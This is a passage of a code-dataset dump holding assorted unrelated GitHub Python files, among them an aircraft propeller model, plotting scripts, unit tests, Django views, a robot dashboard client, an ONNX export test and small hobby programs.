raw_input()\n print(\"Case #%i: %s\" % (caseNr, solve(cipher)))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_155/1052.py","file_name":"1052.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38836421913","text":"## @ingroup Components-Energy-Converters\n# Propeller_Lo_Fid.py\n#\n# Created: Jun 2014, E. Botero\n# Modified: Jan 2016, T. MacDonald\n\n# ----------------------------------------------------------------------\n# Imports\n# ----------------------------------------------------------------------\n\n# suave imports\nimport SUAVE\n\n# package imports\nimport numpy as np\nfrom SUAVE.Components.Energy.Energy_Component import Energy_Component\nfrom warnings import warn\n\n# ----------------------------------------------------------------------\n# Propeller Class\n# ---------------------------------------------------------------------- \n## @ingroup Components-Energy-Converters\nclass Propeller_Lo_Fid(Energy_Component):\n \"\"\"This is a low-fidelity propeller component.\n \n Assumptions:\n None\n\n Source:\n None\n \"\"\" \n def __defaults__(self):\n \"\"\"This sets the default values for the component to function.\n\n Assumptions:\n None\n\n Source:\n N/A\n\n Inputs:\n None\n\n Outputs:\n None\n\n Properties Used:\n None\n \"\"\" \n self.tip_radius = 0.0\n self.propulsive_efficiency = 0.0\n\n \n def spin(self,conditions):\n \"\"\"Analyzes a propeller given geometry and operating conditions.\n\n Assumptions:\n per source\n\n Source:\n Qprop theory document\n\n Inputs:\n self.inputs.omega [radian/s]\n self.inputs.torque [Nm]\n conditions.freestream.\n density [kg/m^3]\n dynamic_viscosity [kg/(m-s)]\n velocity [m/s]\n speed_of_sound [m/s]\n temperature [K]\n\n Outputs:\n conditions.propulsion.etap [-] (propulsive efficiency)\n thrust [N]\n Qm [Nm] (torque)\n power [W]\n Cp [-] (coefficient of power)\n\n Properties Used:\n self.tip_radius [m]\n self.propulsive_efficiency [-]\n \"\"\" \n \n # Unpack \n R = self.tip_radius\n etap = self.propulsive_efficiency\n omega = self.inputs.omega\n Qm = self.inputs.torque\n rho = conditions.freestream.density[:,0,None]\n mu = conditions.freestream.dynamic_viscosity[:,0,None]\n V = conditions.freestream.velocity[:,0,None]\n a = conditions.freestream.speed_of_sound[:,0,None]\n T = conditions.freestream.temperature[:,0,None]\n \n # Do very little calculations\n power = Qm*omega\n n = omega/(2.*np.pi) \n D = 2*R\n \n thrust = etap*power/V\n \n Cp = power/(rho*(n*n*n)*(D*D*D*D*D))\n conditions.propulsion.etap = etap\n \n return thrust, Qm, power, Cp\n","repo_name":"suavecode/SUAVE","sub_path":"trunk/SUAVE/Components/Energy/Converters/Propeller_Lo_Fid.py","file_name":"Propeller_Lo_Fid.py","file_ext":"py","file_size_in_byte":2953,"program_lang":"python","lang":"en","doc_type":"code","stars":349,"dataset":"github-code","pt":"61"} +{"seq_id":"29988995838","text":"#Regular calculation modules.\nimport numpy as np \nimport scipy as sp \n#Allows a debug-output stream.\nimport sys as sys \n#Physical constants list.\nfrom scipy.constants import *\n#Time differences.\nimport time as time \n#Command line arguments.\nimport argparse as argparse \n\n#griddata to format data\nfrom matplotlib.mlab import griddata \n\n#cycler will cause a colour cycle automatically\nfrom cycler import cycler \n#pyplot is simple plotting\nimport matplotlib.pyplot as plt \nfrom matplotlib.colors import BoundaryNorm\nfrom matplotlib.ticker import MaxNLocator\n#Commandline arguments instruction.\n\nparser = argparse.ArgumentParser(prog=\"Contour Plot\",\n description = \"Filename for contour plot.\")\nparser.add_argument(\n '-f',\n '--filename',\n help='File to plot',\n action='store',\n type = str,\n default = 'transport.txt'\n) \nargs = parser.parse_args() \nfilename = args.filename\n\n\nfile_handler = open( filename, \"r\" );\n\ndata = np.genfromtxt(file_handler, dtype=None, usecols=range(0,4)); #excluding the symtype col\n\n\nbetaFraction = data[:,0];\n\nbeta = data[:,0]; #betaFraction, actually. kT/U\nepsilon = data[:,2];\ntransport = data[:,3]; \n\n\nlin_b = np.linspace(min(beta), max(beta), 10)\n#lin_e = np.linspace(min(epsilon), max(epsilon), 2500)\nlin_e = np.linspace(-.15, .5, 2500);\n\nx, y = np.meshgrid(lin_b, lin_e)\nz = griddata(beta, epsilon, transport, lin_b, lin_e, interp='linear')\n\nepsilonArray = y[:, 0];\n\nplt.rc('axes', prop_cycle=(cycler('color', ['r', 'g', 'b', 'c', 'm','k'])));\nfig, ax = plt.subplots();\nax.plot(y, z + x/10.00); \nax.set_xlabel( \"epsilon\" ,fontsize=30); \nax.set_ylabel( \"T(e) + beta/10\" ,fontsize=30); \n#ax.legend(['kT=%.3f [U]' % b for b in x[0, :]], loc='upper center', ncol=10, bbox_to_anchor=(.5, 1.15));\nplt.show (); ","repo_name":"daimonie/selfconsistentcapacitivegreen","sub_path":"transportPlot.py","file_name":"transportPlot.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3086824950","text":"from tkpy.buildings import Buildings\nfrom tkpy.buildings import BuildingQueue\nfrom tkpy.buildings import ConstructionList\nfrom tkpy.enums.building import BuildingType\nimport unittest\nimport requests_mock\nimport pickle\nimport json\n\n\nclass TestBuildings(unittest.TestCase):\n def testing_buildings(self):\n with open(\"./tests/unit/fixtures/pickled_driver.py\", \"rb\") as f:\n g = pickle.load(f)\n\n with open(\"./tests/unit/fixtures/buildings_raw.json\", \"r\") as f:\n buildings_raw = json.load(f)\n\n with requests_mock.mock() as mock:\n mock.register_uri(\n \"POST\", \"https://com1.kingdoms.com/api/\", json=buildings_raw\n )\n b = Buildings(g, 536461288)\n b.pull()\n self.assertEqual(len(b[BuildingType.CROPLAND]), 6)\n self.assertEqual(len(b.freeSlots), 8)\n self.assertEqual(len(list(b.raw)), 40)\n self.assertEqual(b[BuildingType.CROPLAND][0].id, \"4\")\n self.assertEqual(b[BuildingType.CROPLAND][0][\"buildingType\"], \"4\")\n self.assertEqual(b[BuildingType.CROPLAND][0].location, \"2\")\n self.assertEqual(b[BuildingType.CROPLAND][0].lvl, 6)\n self.assertFalse(b[BuildingType.CROPLAND][0].is_max_level)\n self.assertEqual(\n b[BuildingType.CROPLAND][0].upgrade_cost,\n {\"1\": 1625, \"2\": 1950, \"3\": 1845, \"4\": 0},\n )\n with self.assertRaises(KeyError):\n b[BuildingType.CROPLAND][0][\"KeyError\"]\n\n with self.assertRaises(TypeError):\n b[\"NotABuildingType\"]\n\n with requests_mock.mock() as mock:\n mock.register_uri(\n \"POST\", \"https://com1.kingdoms.com/api/\", json={\"mock\": \"mocked\"}\n )\n r = b[BuildingType.CROPLAND][0].upgrade()\n self.assertEqual(r, {\"mock\": \"mocked\"})\n r = b[BuildingType.CROPLAND][0].queues(reserveResources=False)\n self.assertEqual(r, {\"mock\": \"mocked\"})\n\n def testing_building_queue(self):\n with open(\"./tests/unit/fixtures/pickled_driver.py\", \"rb\") as f:\n g = pickle.load(f)\n\n with open(\"./tests/unit/fixtures/building_queue_raw.json\", \"r\") as f:\n building_queue_raw = json.load(f)\n\n with requests_mock.mock() as mock:\n mock.register_uri(\n \"POST\", \"https://com1.kingdoms.com/api/\", json=building_queue_raw\n )\n bq = BuildingQueue(g, 536461288)\n bq.pull()\n self.assertEqual(bq.freeSlots, {\"1\": 1, \"2\": 1, \"4\": 1})\n self.assertEqual(bq.queues, {\"1\": [], \"2\": [], \"4\": [], \"5\": []})\n\n with requests_mock.mock() as mock:\n mock.register_uri(\n \"POST\", \"https://com1.kingdoms.com/api/\", json={\"mock\": \"mocked\"}\n )\n r = bq.finishNow(2)\n self.assertEqual(r, {\"mock\": \"mocked\"})\n\n def testing_construction_list(self):\n with open(\"./tests/unit/fixtures/pickled_driver.py\", \"rb\") as f:\n g = pickle.load(f)\n\n with open(\"./tests/unit/fixtures/construction_list_raw.json\", \"r\") as f:\n construction_list_raw = json.load(f)\n\n with requests_mock.mock() as mock:\n mock.register_uri(\n \"POST\", \"https://com1.kingdoms.com/api/\", json=construction_list_raw\n )\n c = ConstructionList(g, 536461288, \"39\")\n c.pull()\n self.assertEqual(len(c.buildable), 4)\n self.assertEqual(len(c.notBuildable), 8)\n with self.assertRaises(KeyError):\n c[BuildingType.CRANNY]\n self.assertFalse(c[BuildingType.IRON_FOUNDRY][\"buildable\"])\n self.assertTrue(c[BuildingType.SMITHY][\"buildable\"])\n with self.assertRaises(KeyError):\n c[BuildingType.SMITHY][\"keyError\"]\n\n with self.assertRaises(TypeError):\n c[\"NotABuildingType\"]\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"didadadida93/tkpy","sub_path":"tests/unit/test_buildings.py","file_name":"test_buildings.py","file_ext":"py","file_size_in_byte":3899,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"41502733902","text":"import turtle\r\n\r\nn = int(input(\"Введите число \"))\r\n\r\ncolor = 0\r\nw = turtle.Screen()\r\nw.bgcolor(\"lightgreen\")\r\nheight = w.window_height() #высота\r\nwidth = w.window_width() #длина\r\n\r\nalex = turtle.Turtle()\r\nalex.shape(\"turtle\")\r\n# alex.color(\"white\")\r\nalex.speed(0)\r\nalex.penup()\r\nalex.setpos(-199, +199)\r\nalex.setpos(-width//2+20, +height//2-20)\r\nalex.right(90)\r\n\r\nwhile n>0:\r\n if color % 3 == 0 :\r\n alex.color(\"red\")\r\n elif (color-1) % 3 == 0: \r\n alex.color(\"green\")\r\n else: \r\n alex.color(\"blue\")\r\n alex.pendown()\r\n alex.forward(height-50)\r\n alex.penup()\r\n alex.left(90)\r\n alex.forward(20)\r\n alex.left(90) \r\n alex.forward(height-50)\r\n alex.left(180)\r\n color += 1\r\n n -= 1\r\n\r\n\r\nw.mainloop()","repo_name":"DegtyarevaAS/TURTLE","sub_path":"ch2.py","file_name":"ch2.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33563516257","text":"# Create a Product class with 3 attributes\n#SENSEI BONUS: Update the product class to give each product a unique id. Update the sell_product method to accept the unique id.\nclass Product:\n def __init__(self, name, price, category, id):\n self.name = name\n self.price = price\n self.category = category\n self.id = id\n# Add the update_price method to the Product class\n def update_price(self, percent_change, is_increased):\n if is_increased == True:\n x = self.price + (self.price * percent_change)\n self.price = round(x, 2)\n self.print_info()\n return self\n else: \n x = self.price - (self.price * percent_change)\n self.price = round(x, 2)\n self.print_info()\n return self\n# Add the print_info method to the Product class\n def print_info(self):\n print(f'Current price for {self.name} {self.category} are ${self.price}!')\n return self","repo_name":"c-osornio/python_stack","sub_path":"fundamentals/extras/Store&Products/products.py","file_name":"products.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"16530032756","text":"from django.shortcuts import render, HttpResponse,redirect\nfrom home.models import About\nfrom datetime import datetime\nfrom django.contrib import messages\nfrom django.views import View\n\n# Create your views here.\n\ncontext = {\n \"Author\": \"Jawad Ahmed\"\n}\n\n\ndef index(request):\n return render(request, 'index.html', {\"Author\":context})\n # return HttpResponse(f\"Home Page {id}\")\n\n\nclass AboutClass(View):\n def get(self, request):\n return render(request, \"about.html\", {\"data\": About.objects.all(),\"Author\": context})\n\n def post(self, request):\n print(\"request.POST\",request.POST.get('id'))\n # return HttpResponse(\"ok\")\n if request.POST.get('id',False):\n about = About.objects.filter(id = request.POST.get('id')).first()\n if about:\n # return HttpResponse(about.id)\n about.name = request.POST.get('name')\n about.email = request.POST.get('email')\n about.phone = request.POST.get('phone')\n about.desc = request.POST.get('desc')\n about.save()\n return render(request, \"about.html\", {\"data\": About.objects.all(),\"Author\": context})\n else:\n messages.error(request, 'Data Not Faund')\n return render(request, \"about.html\", {\"data\": About.objects.all(),\"Author\": context})\n \n else:\n about = About(name=request.POST.get('name'), email=request.POST.get('email'), phone=request.POST.get('phone'), desc=request.POST.get('desc'), date=datetime.today())\n about.save()\n messages.success(request, 'Data Added Successfully')\n return render(request, \"about.html\", {\"data\": About.objects.all(),\"Author\": context})\n # return redirect('/about')\n\n def delete(self, request, id):\n record = About.objects.get(id = id)\n record.delete()\n return render(request, \"about.html\", {\"data\": About.objects.all(),\"Author\": context})\n \ndef contact(request, id):\n return HttpResponse(f\"Contact Page {id}\")\n","repo_name":"jawad224/djangoPractice","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13757328714","text":"from rest_framework.serializers import ModelSerializer\nfrom bookapp.models import Books\nfrom rest_framework import serializers\n\nclass BookSerializer(ModelSerializer):\n # user=serializers.CharField(read_only=True)\n\n class Meta:\n model=Books\n fields=\"__all__\"\n\n def create(self, validated_data):\n # user=self.context.get(\"user\")\n book_name=self.context.get(\"book_name\")\n return Books.objects.create(**validated_data,book_name=book_name)","repo_name":"abhisharaveendran9/bookstore","sub_path":"api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17794432358","text":"import sys, os\nsys.path.append(os.path.abspath(\"..\"))\nfrom aoc21 import aoc\n\ndef get_neighbours(x, y, max_x, max_y):\n neighbours = []\n\n if x != 0:\n neighbours.append((x-1, y))\n if x != max_x - 1:\n neighbours.append((x+1, y))\n if y != 0:\n neighbours.append((x, y-1))\n if y != max_y - 1:\n neighbours.append((x, y+1))\n \n return neighbours\n\n\ninput = aoc.aoc()\n\nmax_y = len(input)\nmax_x = len(input[0])\n\nvar_input = [[0 for _ in range(max_x)] for _ in range(max_y)]\n\nfor x in range(max_x):\n for y in range(max_y):\n var_input[y][x] = int(input[y][x])\n\ninput = var_input\n\nminima = []\n\nfor y in range(max_y):\n row = input[y]\n for x in range(max_x):\n value = row[x]\n lower_neighbours = list(filter(lambda pos: input[pos[1]][pos[0]] <= value, get_neighbours(x, y, len(row), len(input))))\n \n if len(lower_neighbours) == 0:\n minima.append((x, y))\n\nbasins = []\n\nfor minimum in minima:\n\n\n value = input[minimum[1]][minimum[0]]\n to_explore = list(filter(lambda pos: input[pos[1]][pos[0]] > value and input[pos[1]][pos[0]] != 9, get_neighbours(minimum[0], minimum[1], max_x, max_y)))\n\n explored = [minimum]\n\n while len(to_explore) > 0:\n exploring = to_explore.pop(0)\n val = input[exploring[1]][exploring[0]]\n explored.append(exploring)\n if val == 9:\n continue\n to_explore += list(filter(lambda pos: input[pos[1]][pos[0]] > val and pos not in explored and pos not in to_explore and input[pos[1]][pos[0]] != 9, get_neighbours(exploring[0], exploring[1], max_x, max_y)))\n\n basins.append(len(explored))\n\n\nbasins.sort()\nmax_basins = (basins[-3:])\n\nmult = 1\n\nfor b in max_basins:\n mult *= b\n\nprint(f\"The multiplied basin area is {mult}\")\n","repo_name":"Smephite/aoc2021","sub_path":"day09/day09_2.py","file_name":"day09_2.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37342764446","text":"'''This program is used to connect to the Dsashboard services fro provided message type, either from the std_srvs.srv (Trigger) or from the ur_dashboard_msgs.srv (UR Dashboard)\n\nThe dahsbaord commands are on the ROS service and can be activated through connecting to the corresponding service\n\nFor more details of which service was being used here: https://github.com/UniversalRobots/Universal_Robots_ROS_Driver/blob/master/ur_robot_driver/doc/ROS_INTERFACE.md\n\nMSg_name exmaples: Load, Popup, IsInRemoteControl, Trigger\n\nPerform timeout check from the Timer.py to identify whether the client is successfully connected to the serivce\n- if the time out has reached and service is not connected, output the result. The std_srv.srvs returns 2 output (http://docs.ros.org/api/std_srvs/html/srv/Trigger.html)\nthis can be directly accessed through the request result\ne.g. \n\nclient = rospy.ServiceProxy('power on', Trigger)\nrequest = TriggerRequest()\nressult = client(request)\n\nprint(result.answer)\nprint(result.success)\n\nservice_name is the pre-defined service name that is called upon the instantiation of the program\nhttp://docs.ros.org/api/std_srvs/html/srv/Trigger.html \nhttps://github.com/UniversalRobots/Universal_Robots_ROS_Driver/blob/master/ur_robot_driver/doc/ROS_INTERFACE.md\nhttps://github.com/UniversalRobots/Universal_Robots_ROS_Driver/tree/98e0d87234cdbd75736c0a30b817cd4ec34bc469/ur_dashboard_msgs \n\n'''#!/usr/bin/env python\n\n# import all the relavent libraries and service messages that is relevant in obtaining the dahsboard result\nimport rospy\nfrom ur_dashboard_msgs.srv import Load, LoadRequest, Popup, PopupRequest, IsInRemoteControl,IsInRemoteControlRequest, GetRobotMode, GetRobotModeRequest\nfrom std_srvs.srv import Trigger, TriggerRequest\nimport time\nfrom Timer import Time_Out_Check\n\nclass Dashboard_Client:\n def __init__(self, service_str_name, Msg_Name, Msg_Request):\n self.service_general_name = '/ur_hardware_interface/dashboard/'\n self.time_out_check = Time_Out_Check()\n self.Msg_Name = Msg_Name\n self.Msg_Request = Msg_Request\n self.service_str_name = service_str_name\n self.service_name = self.service_general_name+self.service_str_name\n def tout(self, result):\n return self.time_out_check.time_out(result, Msg_Request_Name=self.Msg_Request)\n \n def connect(self):\n rospy.wait_for_service(self.service_name)\n client =rospy.ServiceProxy(self.service_name, self.Msg_Name)\n request = self.Msg_Request\n # request = TriggerRequest()\n result = client(request) \n # self.tout(result)\n print(result)\n self.time_out_check.time_out(result,self.Msg_Request)\n return result\n\n def load(self, file_name):\n service_name = '/ur_hardware_interface/dashboard/load_program'\n # rospy.init_node('Dashboard_load_program')\n rospy.wait_for_service(service_name)\n client =rospy.ServiceProxy(service_name, Load)\n request = LoadRequest()\n request.filename = file_name+'.urp'\n print('loading program:',request.filename)\n result = client(request)\n # self.time_out_check.time_out(result, Msg_Request_Name=self.Msg_Request)\n self.tout(result)\n # print(result.success)\n return result\n \n def robot_mode(self):\n service_name = self.service_general_name+'get_robot_mode'\n \n rospy.wait_for_service(service_name, timeout=3)\n # req = ur_dashboard_msgs.msg.RobotMode()\n # print(req.answer)\n # print(m)\n client = rospy.ServiceProxy(service_name,GetRobotMode)\n request = GetRobotModeRequest()\n result = client(request)\n # self.tout(result)\n print('==========')\n print(result)\n \n return result.answer\n \n def play(self):\n status = {#'Robotmode: ':'NO_CONTROLLER'\n # ,'Robotmode: ':'DISCONNECTED'\n # ,'Robotmode: ':'CONFIRM_SAFETY'\n # ,'Robotmode: ':'BOOTING',\n 'OFF':'Robotmode: POWER_OFF',\n 'ON':'Robotmode: POWER_ON',\n 'RUNNING':'Robotmode: RUNNING'\n }\n robot_status_check = self.robot_mode()\n print('===========')\n # print(status['RUNNING'])\n while robot_status_check != status['RUNNING']:\n robot_status_check = self.robot_mode()\n time.sleep(1)\n print('The current mode is in: {}'.format(robot_status_check))\n \n rospy.loginfo('Starting program!')\n print('starting program!!')\n self.connect()\n\n \n # print('uuuu')\n # else:\n # print('It is taking its damn time to connect to the robot, so waitttt')\n \n # raise SystemError('Check if the robot is powered on/ in remote control!')\n # self.time_out_check.time_out(result,self.Msg_Request)\n\n\n \n# is_remote_check = Dashboard_Service('is_in_remote_control', IsInRemoteControl, IsInRemoteControlRequest())\n# is_remote_check.load()\n\n# power_on =Dashboard_Client('power_on', Trigger, TriggerRequest())\n# power_on.connect()\n# brake_release =Dashboard_Client('brake_release', Trigger, TriggerRequest())\n# brake_release.connect()\n\n\n# program_name = {'external':'external_control', 'pcb_pick_and_place':'pcb', 'test':'testing'}\n# load_program = Dashboard_Client('load_program', Load, LoadRequest())\n# load_program.load(file_name = program_name['external'])\n\n# play = Dashboard_Client('play', Trigger, TriggerRequest())\n# play.play()\n# # play.connect()\n\n\n# time.sleep(5) \n# spause = Dashboard_Client('pause', Trigger, TriggerRequest()) \n\n# # pause.connect()\n\n# stop =Dashboard_Client('stop', Trigger, TriggerRequest())\n# stop.connect()\n","repo_name":"evacheung0929/UR5e_Simulation_And_Dual_Arm_Control","sub_path":"Universal_Robots_ROS_Driver/ur_robot_driver/scripts/single_robot/wait_4_service.py","file_name":"wait_4_service.py","file_ext":"py","file_size_in_byte":5701,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"43299869037","text":"from tkinter import *\r\nroot=Tk()\r\nroot.title(\"form\")\r\nroot.geometry(\"500x500+0+0\")\r\ndef show_text():\r\n if checkvar.get()==1:\r\n result1 = \"Name : \"+ text_field.get('1.0',END) +\"Gender : \"+ gendervar.get()\r\n result.config(text=str(result1))\r\n else:\r\n result.config(text=\"Accept\")\r\n\r\n\r\n \r\n\r\n\r\ntext_field=Text(root)\r\nname=Label(root,text=\"Enter Name\",font=(\"times new roman\",20,\"bold\"),fg=\"blue\").place(x=30,y=55)\r\ntext_field.place(x=250,y=50,width=200,height=50)\r\n\r\n\r\ngendervar=StringVar()\r\ngender=Label(root,text=\"Select Gender\",font=(\"times new roman\",20,\"bold\"),fg=\"blue\").place(x=30,y=205)\r\nradiob1=Radiobutton(root,font=(\"times new roman\",20,\"bold\"),value=\"Female\",variable=gendervar).place(x=250,y=200)\r\nl1=Label(root,text=\"F\").place(x=252,y=230)\r\nradiob2=Radiobutton(root,font=(\"times new roman\",20,\"bold\"),value=\"Male\",variable=gendervar).place(x=300,y=200)\r\nl2=Label(root,text=\"M\").place(x=302,y=230)\r\nradiob3=Radiobutton(root,font=(\"times new roman\",20,\"bold\"),value=\"Transgender\",variable=gendervar).place(x=350,y=200)\r\nl3=Label(root,text=\"T\").place(x=352,y=230)\r\ngendervar.set(\"Female\")\r\n\r\n\r\ncheckvar=IntVar()\r\ncheckb=Checkbutton(root,text=\"Accept\",font=(\"times new roman\",15,\"bold\"),onvalue=1,offvalue=0,variable=checkvar).place(x=250,y=300)\r\ncheckvar.set(1)\r\nresult=Label(root,text=\"\")\r\nresult.place(x=0,y=350,relwidth=1)\r\nbut=Button(root,text=\"Show\",padx=40,pady=10,bg=\"pink\",fg=\"blue\",activebackground=\"pink\",activeforeground=\"white\",cursor=\"hand2\",command=show_text).place(x=200,y=450)\r\nroot.mainloop()\r\n","repo_name":"PRACHIBHAVSAR/Python-Tkinter","sub_path":"ex1.py","file_name":"ex1.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7565798753","text":"import numpy as np \nimport fitz\nimport re\n\ndef ola_bill(a):\n\n index_name=0\n index_mob=0\n index_date=0\n index_sid=0\n\n for i,jj in enumerate(a):\n xx = jj.split()\n if [w for w in xx if re.search('(Name|Name(s)|given|name|names|Names)$', w)]:\n index_name=i\n x=re.split(\"Customer Name\",a[i])\n name=x[1]\n print(\"the travelled person name is \",name)\n for i,jj in enumerate(a):\n xx = jj.split()\n if [w for w in xx if re.search('(Mobile|Number)$', w)]:\n index_mob=i\n y=re.split(\"Mobile Number\",a[i])\n\n mob=y[1]\n print(\"the travelled person mobile number is \",mob)\n for i,jj in enumerate(a):\n xx = jj.split()\n if [w for w in xx if re.search('(Date|date)$', w)]:\n index_date=i\n z=re.split(\"Invoice Date\",a[i])\n\n date=z[1]\n print(\"the date of travel is \",date)\n # Invoice Serial Id:DVDJEKW200769\n list1=[]\n list2=[]\n for i,jj in enumerate(a):\n sno=re.findall(\"[A-Z]{7}\\d{6}\",jj)\n if sno!=[\" \"] and len(sno)==1:\n list1.append(sno) \n serial_id=list1[0][0]\n for i,jj in enumerate(a):\n xx = jj.split()\n if jj==\"Total Bill (rounded off)\":\n index_date=i\n totalfare=a[i+2]\n print(\"Total Fare for the trip is \" ,totalfare)\n # serial_id=z[1]\n print(\"the invoice serial id of travel is \",serial_id)\n for i,jj in enumerate(a):\n xx=jj.split()\n time=re.findall(\"\\d{2}:\\d{2}\\s[A-Z]{2}\",jj)\n if time!=[\" \"] and len(time)==1:\n list2.append(time) \n time1=list2[0][0]\n time2=list2[1][0]\n # print(time1,time2)\n index_time=0\n b=[]\n for i,jj in enumerate(a):\n xx = jj.split()\n if(jj==time1):\n b.append(i)\n if(jj==time2):\n temp=i\n # print(temp)\n break\n temp1=b[0]\n print(\"the pickup address is \")\n for i in range(temp1,temp-1,1):\n print(a[i+1])\n c=[]\n for i,jj in enumerate(a):\n xx = jj.split()\n if(jj==time2):\n c.append(i)\n if(jj==\"Ride Fare\"):\n temp=i\n # print(temp)\n break\n # print(temp)\n temp2=c[0]\n print(\"the Drop address is \")\n for i in range(temp2,temp-1,1):\n print(a[i+1])\n\nfile = '/home/ananthu/projects/invoice_extraction/data/ola_bill1.pdf'\ndoc = fitz.open(file)\npage_count = doc.pageCount\n#print(page_count)\npage =0 \n\ntext = str()\nwhile( page < page_count):\n p = doc.loadPage(page)\n page += 1\n text = text + p.getText()\n#print(text)\na=[]\nlines1 = text.split('\\n')\nfor lin in lines1:\n s = lin.strip()\n s = s.rstrip()\n s = s.lstrip()\n a.append(s)\n#print(a)\nola_bill(a)\n\n","repo_name":"ananthu10-ai/machine_learning","sub_path":"invoice_extraction/ocr_bill.py","file_name":"ocr_bill.py","file_ext":"py","file_size_in_byte":2733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8494319438","text":"#! /usr/bin/env python\n\nimport torch\nimport torch.nn as nn\nimport numpy as np\nimport onnx\nfrom onnxsim import simplify\nimport numpy as np\nnp.random.seed(0)\n\n\nclass pseudo_GroupNorm(nn.Module):\n def __init__(self, num_features, num_groups=3, eps=1e-5):\n super(pseudo_GroupNorm, self).__init__()\n self.weight = nn.Parameter(torch.ones(1,num_features,1,1))\n self.bias = nn.Parameter(torch.zeros(1,num_features,1,1))\n self.num_groups = num_groups\n self.eps = eps\n\n def forward(self, x):\n N,C,H,W = x.size()\n G = self.num_groups\n assert C % G == 0\n\n x = x.view(N,G,-1)\n mean = x.mean(-1, keepdim=True)\n var = x.var(-1, keepdim=True)\n\n x = (x-mean) / (var+self.eps).sqrt()\n x = x.view(N,C,H,W)\n return x * self.weight + self.bias\n\n\nclass Model(nn.Module):\n def __init__(\n self,\n ):\n super(Model, self).__init__()\n self.gn = nn.GroupNorm(3, 6)\n\n def forward(self, x):\n return self.gn(x)\n\n\nif __name__ == \"__main__\":\n OPSET=11\n MODEL = f'GroupNormalization'\n model = Model()\n onnx_file = f\"{MODEL}_{OPSET}.onnx\"\n x = torch.randn(20, 6, 10, 10)\n torch.onnx.export(\n model,\n args=(x),\n f=onnx_file,\n opset_version=OPSET,\n input_names=[\n f'{MODEL}_input',\n ],\n output_names=[\n f'{MODEL}_output',\n ],\n do_constant_folding=False,\n )\n model_onnx1 = onnx.load(onnx_file)\n model_onnx1 = onnx.shape_inference.infer_shapes(model_onnx1)\n onnx.save(model_onnx1, onnx_file)\n model_onnx2 = onnx.load(onnx_file)\n model_simp, check = simplify(model_onnx2)\n onnx.save(model_simp, onnx_file)\n\n OPSET=18\n MODEL = f'GroupNormalization'\n model = Model()\n onnx_file = f\"{MODEL}_{OPSET}.onnx\"\n x = torch.randn(20, 6, 10, 10)\n torch.onnx.export(\n model,\n args=(x),\n f=onnx_file,\n opset_version=OPSET,\n input_names=[\n f'{MODEL}_input',\n ],\n output_names=[\n f'{MODEL}_output',\n ],\n do_constant_folding=False,\n )\n model_onnx1 = onnx.load(onnx_file)\n model_onnx1 = onnx.shape_inference.infer_shapes(model_onnx1)\n onnx.save(model_onnx1, onnx_file)\n model_onnx2 = onnx.load(onnx_file)\n model_simp, check = simplify(model_onnx2)\n onnx.save(model_simp, onnx_file)","repo_name":"PINTO0309/onnx2tf","sub_path":"make_test_op/make_GroupNormalization.py","file_name":"make_GroupNormalization.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","stars":410,"dataset":"github-code","pt":"61"} +{"seq_id":"40104894238","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom main.models import Task, Progress\n\n# Create your views here.\ndef index(request):\n tasks = Task.objects.all()\n context = { 'tasks' : tasks }\n return render(request, 'main/index.html', context)\n\ndef addTask(request):\n name = request.GET['taskname']\n desc = request.GET['taskdesc']\n freq = request.GET['taskfreq']\n task = Task(name=name, description=desc, weeklyfreq=int(freq))\n task.save()\n return HttpResponse(status=200)\n\ndef deleteTask(request):\n name = request.GET['taskname']\n task = Task.objects.get(name=name)\n Progress.objects.filter(task=task).delete()\n task.delete()\n return HttpResponse(status=200)\n\ndef resetProgress(request):\n name = request.GET['taskname']\n task = Task.objects.get(name=name)\n prog = [p for p in Progress.objects.filter(task=task) if p.done_this_week()]\n for p in prog:\n p.delete()\n return HttpResponse(status=200)\n\ndef incProgress(request):\n name = request.GET['taskname']\n task = Task.objects.get(name=name)\n prog = Progress(task=task)\n prog.save()\n return HttpResponse(status=200)\n\ndef semantic_index(request):\n return render(request, 'main/index-semantic.html')\n\ndef servePartial(request, partialname):\n return render(request, 'main/partials/' + partialname + '.html')\n","repo_name":"agentreno/tasktracker","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3613704487","text":"import pygame, sys\r\npygame.init()\r\n\r\n# screen\r\nBLOCK = 15\r\nSPEED = 15\r\nWIDTH = 500\r\n\r\n\r\n# colors\r\nCOLOR_BLACK = (0, 0, 0)\r\nCOLOR_BLUE = (0, 0, 255)\r\nCOLOR_WHITE = (255, 255, 255)\r\n\r\n#background image\r\nmain_menu = pygame.image.load(\"assets/snake_menu.jpg\")\r\n#background1 = pygame.image.load(\"startscreen.png\")\r\npause_menu_image = pygame.image.load(\"assets/pause.jpg\")\r\ncredits_menu_image = 